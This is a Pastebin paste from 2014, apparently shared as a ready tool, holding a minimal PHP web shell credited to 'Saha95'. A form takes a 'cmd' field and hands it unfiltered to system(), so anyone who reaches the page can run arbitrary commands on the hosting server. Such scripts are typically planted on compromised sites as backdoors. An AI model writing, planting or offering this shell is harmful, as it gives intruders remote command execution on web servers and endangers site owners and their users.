3x5w4rup

Terminal , Console , CMD , PHP Code

Jun 1st, 2014
503
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.27 KB | None | 0 0
  1. <?
  2. # Coded By : Saha95
  3. ?>
  4. <form method='post'>
  5. <input type='text' name='cmd'>
  6. <input type='submit' name='sa' value='run'>
  7. <pre>
  8. <!-- START CODE PHP -->
  9. <?
  10. if(!empty($_POST['sa'])) {
  11.     system($_POST['cmd']);
  12. }
  13. ?>
  14. <!-- END CODE PHP -->
  15. <center> By Saha95 </center>
Advertisement
Add Comment
Please, Sign In to add comment